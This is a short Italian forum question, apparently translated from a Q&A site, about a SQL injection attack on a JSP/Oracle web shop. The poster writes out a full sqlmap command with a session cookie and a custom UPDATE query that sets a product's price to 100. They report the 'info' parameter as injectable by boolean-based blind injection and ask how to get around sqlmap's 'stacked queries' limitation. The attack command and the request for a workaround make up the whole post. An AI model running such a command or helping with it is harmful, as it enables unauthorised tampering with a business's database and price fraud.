voto negativo preferito Sto cercando di usare il seguente codice
sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price"
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'"
Ho controllato questo link prima ed è iniettabile nel parametro info (blind basato su booleani). il risultato dell'esecuzione del codice precedente è:
warning: "execution of custom SQL queries is only available when stacked queries are supported"
C'è qualche soluzione per farlo?
Questo sito Web è in esecuzione su Apache, JSP e Oracle.